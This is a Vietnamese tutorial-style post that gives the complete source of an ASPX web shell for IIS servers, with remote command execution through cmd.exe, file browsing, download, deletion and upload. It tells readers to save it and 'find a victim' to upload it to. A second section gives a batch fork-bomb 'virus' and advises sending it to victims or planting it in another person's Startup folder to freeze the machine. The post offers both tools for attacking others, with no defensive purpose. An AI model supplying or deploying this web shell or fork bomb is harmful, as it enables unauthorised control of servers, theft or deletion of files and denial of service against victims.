File shell aspx


Đây là nội dung file shell chạy trên các máy chủ cài IIS

<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
    string outstr = "";
   
    // get pwd
    string dir = Page.MapPath(".") + "/";
    if (Request.QueryString["fdir"] != null)
        dir = Request.QueryString["fdir"] + "/";
    dir = dir.Replace("\\", "/");
    dir = dir.Replace("//", "/");
   
    // build nav for path literal
    string[] dirparts = dir.Split(‘/’);
    string linkwalk = "";   
    foreach (string curpart in dirparts)
    {
        if (curpart.Length == 0)
            continue;
        linkwalk += curpart + "/";
        outstr += string.Format("<a href=’?fdir={0}’>{1}/</a>&nbsp;",
                                    HttpUtility.UrlEncode(linkwalk),
                                    HttpUtility.HtmlEncode(curpart));
    }
    lblPath.Text = outstr;
   
    // create drive list
    outstr = "";
    foreach(DriveInfo curdrive in DriveInfo.GetDrives())
    {
        if (!curdrive.IsReady)
            continue;
        string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
        outstr += string.Format("<a href=’?fdir={0}’>{1}</a>&nbsp;",
                                    HttpUtility.UrlEncode(driveRoot),
                                    HttpUtility.HtmlEncode(driveRoot));
    }
    lblDrives.Text = outstr;

    // send file ?
    if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
    {
        Response.ClearContent();
        Response.WriteFile(Request.QueryString["get"]);
        Response.End();
    }

    // delete file ?
    if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
        File.Delete(Request.QueryString["del"]);   

    // receive files ?
    if(flUp.HasFile)
    {
        string fileName = flUp.FileName;
        int splitAt = flUp.FileName.LastIndexOfAny(new char[] { ‘/’, ‘\\’ });
        if (splitAt >= 0)
            fileName = flUp.FileName.Substring(splitAt);
        flUp.SaveAs(dir + "/" + fileName);
    }

    // enum directory and generate listing in the right pane
    DirectoryInfo di = new DirectoryInfo(dir);
    outstr = "";
    foreach (DirectoryInfo curdir in di.GetDirectories())
    {
        string fstr = string.Format("<a href=’?fdir={0}’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curdir.Name),
                                    HttpUtility.HtmlEncode(curdir.Name));
        outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
    }
    foreach (FileInfo curfile in di.GetFiles())
    {
        string fstr = string.Format("<a href=’?get={0}’ target=’_blank’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name),
                                    HttpUtility.HtmlEncode(curfile.Name));
        string astr = string.Format("<a href=’?fdir={0}&del={1}’>Del</a>",
                                    HttpUtility.UrlEncode(dir),
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name));
        outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
    }
    lblDirOut.Text = outstr;

    // exec cmd ?
    if (txtCmdIn.Text.Length > 0)
    {
        Process p = new Process();
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.WorkingDirectory = dir;
        p.Start();

        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
        txtCmdIn.Text = "";
    }   
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>ASPX Shell</title>
    <style type="text/css">
        * { font-family: Arial; font-size: 12px; }
        body { margin: 0px; }
        pre { font-family: Courier New; background-color: #CCCCCC; }
        h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
        h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
        th { text-align: left; background-color: #99CC99; }
        td { background-color: #CCFFCC; }
        pre { margin: 2px; }
    </style>
</head>
<body>
    <h1>ASPX Shell by LT</h1>
    <form id="form1" runat="server">

    <table style="width: 100%; border-width: 0px; padding: 5px;">
        <tr>
            <td style="width: 50%; vertical-align: top;">
                <h2>Shell</h2>               
                <asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
                <asp:Button runat="server" ID="cmdExec" Text="Execute" />
                <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
            </td>
            <td style="width: 50%; vertical-align: top;">

                <h2>File Browser</h2>
                <p>
                    Drives:<br />
                    <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
                </p>
                <p>
                    Working directory:<br />

                    <b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
                </p>
                <table style="width: 100%">
                    <tr>
                        <th>Name</th>
                        <th>Size KB</th>
                        <th style="width: 50px">Actions</th>

                    </tr>
                    <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
                </table>
                <p>Upload to this directory:<br />
                <asp:FileUpload runat="server" ID="flUp" />
                <asp:Button runat="server" ID="cmdUpload" Text="Upload" />
                </p>
            </td>

        </tr>
    </table>

    </form>
</body>
</html>

Các bạn copy nội dung trên vào notepad rồi save thành file shell.aspx rồi tiến hành tìm victim để up lên Smile

Nội dung của file shell:

– Đọc file và duyệt file trên máy chủ

– Upload file lên máy chủ (có thể up virus hay shell khác ^_^)

– Thực thi command (cmd)

Có thể up con virus từ bài Làm thế nào tạo virus sau đó thực thi câu lệnh để làm treo máy chủ Smile

Chúc vui vẻ ^_^!

Làm thế nào tạo virus


Mở notepad lên gõ vào dòng : %0|%0

image

Lưu lại thành tên virus.bat

image

Nó sẽ giống thế này

image

Kích đúp vào file Smile

Hey ya thiệt là khổ quá đi Sad smile, vừa click vào cái treo máy luôn Sad smile nên chẳng chụp ảnh màn hình được Open-mouthed smile

đó là test hehe

bạn gửi file này cho nạn nhân bảo họ chạy Open-mouthed smile hoặc vào máy ai đó copy file này bỏ vào C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup đối với win7 còn win xp thì vào start có thư mục Starup Open-mouthed smile

 

File này cũng dùng khi bạn local được sever thì vào excute cái file này cho sever nó treo luôn Open-mouthed smile

Chúc vui vẻ Smile